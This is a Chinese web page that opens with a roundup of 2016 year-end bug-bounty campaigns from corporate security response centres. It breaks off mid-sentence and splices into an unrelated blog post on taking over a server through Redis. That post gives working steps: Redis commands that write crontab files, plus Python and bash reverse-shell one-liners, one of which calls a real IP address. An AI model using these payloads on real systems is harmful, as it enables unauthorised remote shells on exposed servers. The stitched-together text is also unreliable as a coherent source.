【年终特辑】国内各大SRC年终活动汇总(12.5更新)

唯品会安全应急响应中心(VSRC)――单笔最高10万元现金奖励
官网地址:https://sec.vip.com/
活动时间:2016年12月1日- 12月31日
活动奖励:
1.年终现金奖励 最高可获10万元;
计算公式:总金额 = 个人年度总贡献值 x (严重漏洞数量 x 20+ 高危漏洞数量 x 10 + 中危漏洞数量 x 1)
2.旅游类大奖――广州增城三英温泉度假村;
参与条件:VSRC 2016年度贡献值排名前三的白帽子,一人一份;

3.精美定制荣誉水晶奖杯;
参与条件:VSRC 2016年度贡献值排名前三的白帽子,一人一份;
途牛安全应急响应中心(TNSRC)――漏洞3倍积分奖励

官网地址:http://sec.tuniu.com/
活动时间 : 2016年12月1日-2016年12月29日
活动范围 : 所有途牛相关有效漏洞,均在评分时享受3倍积分奖励。
联想安全应急响应中心(LSRC)――12月额外奖励+年终奖
官网地址:http://lsrc.lenovo.com/
活动时间:2016年12月1日- 12月31日
12月份额外奖励:
第一名:3000元京东e卡;(若本月积分大于1000,直接升级为5000元京东e卡)
第二名:2000元京东e卡;(若本月积分大于500,直接升级为3000元京东e卡)
第三名:1000元京东e卡;(若本月积分大于300,直接升级为1500元京东e卡)

参与条件:
1.当月累计安全币达200个以上;
2.当月提交的漏洞中至少含有两个高危漏洞;
LSRC年度精英奖
一等奖(1名):10000元京东e卡
二等奖(2名):5000通过redis getshell的一些小问题 阅读原文»之前在出AT Field的时候,在通过redis弹shell的过程中遇到一些问题,今天专门测试一下,解决一些疑惑
这里我们不考虑如何写入redis中,只考虑从redis到服务器这个过程
使用两种反弹shell的方式,第一种是python弹的
1
| * * * * * /usr/bin/python -c 'import socket,subprocess,os,sys;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxx",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
第二种是直接弹的
1
| */1 * * * * /bin/bash -i >& /dev/tcp/xxxx/12345 0>&1
|
首先要明确第一点,用写入crontab的方式要求redis必须是root用户启动,我们可以看看2个配置文件的权限
1 2 3 4 5 6 7 8 9
| root@fe8fb94b7fb1:/var/spool/cron/crontabs# ll total 12 drwx-wx--T 2 root crontab 4096 Dec 3 08:17 ./ drwxr-xr-x 3 root root 4096 Dec 2 17:27 ../ -rw------- 1 root crontab 1341 Dec 3 06:47 root root@fe8fb94b7fb1:/etc# ll crontab -rw-r--r-- 1 root root 722 Apr 5 2016 crontab
|
很明显如果redis是以redis用户运行的话,在save的时候会报error
ubuntu系统
crontab方式
在debian系统下,首先我们得知道配置文件的位置
1、/etc/crontab
2、/var/spool/cron/crontab/ 单个用户的crontab配置
我们先设置好键值
并写入payload1
1 2 3 4 5 6 7 8 9 10
| 127.0.0.1:6379> config set dir /var/spool/cron/crontab (error) ERR Changing directory: No such file or directory 127.0.0.1:6379> config set dir /var/spool/cron/crontabs OK 127.0.0.1:6379> config set dbfilename root OK 127.0.0.1:6379> get 1 "* * * * * /usr/bin/python -c 'import socket,subprocess,os,sys;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("115.28.78.16",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'" 127.0.0.1:6379> save OK
|
在迷一样的地方截断了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| root@fe8fb94b7fb1:/var/spool/cron/crontabs# xxd root 00000000: 5245 4449 5330 3030 36fe 0000 c001 c340 REDIS0006......@ 00000010: c440 fb02 2a20 2aa0 011f 2f75 7372 2f62 .@..* *.../usr/b 00000020: 696e 2f70 7974 686f 6e20 2d63 2027 696d in/python -c 'im 00000030: 706f 7274 2073 6f63 6b65 1574 2c73 7562 port socke.t,sub 00000040: 7072 6f63 6573 732c 6f73 2c73 7973 3b73 process,os,sys 00000050: 3d80 1a00 2e80 0600 2880 0608 2e41 465f =.......(....AF_ 00000060: 494e 4554 2ca0 0e1f 534f 434b 5f53 5452 INET,...SOCK_STR 00000070: 4541 4d29 3b73 2e63 6f6e 6e65 6374 2828 EAM) 00000080: 2231 3135 2e32 382e 0737 382e 3136 222c "115.28..78.16", 00000090: 3620 0019 2929 3b6f 732e 6475 7032 2873 6 ..)) 000000a0: 2e66 696c 656e 6f28 292c 3029 3b20 e00a .fileno(),0) 000000b0: 1600 31e0 0d16 0432 293b 703d e001 ab07 ..1....2) 000000c0: 2e63 616c 6c28 5b22 60db 0b73 6822 2c22 .call(["`..sh"," 000000d0: 2d69 225d 293b 27ff 8c5e 76ca 1e73 7b64 -i"])
|
好像很顺利
没有评论:
发表评论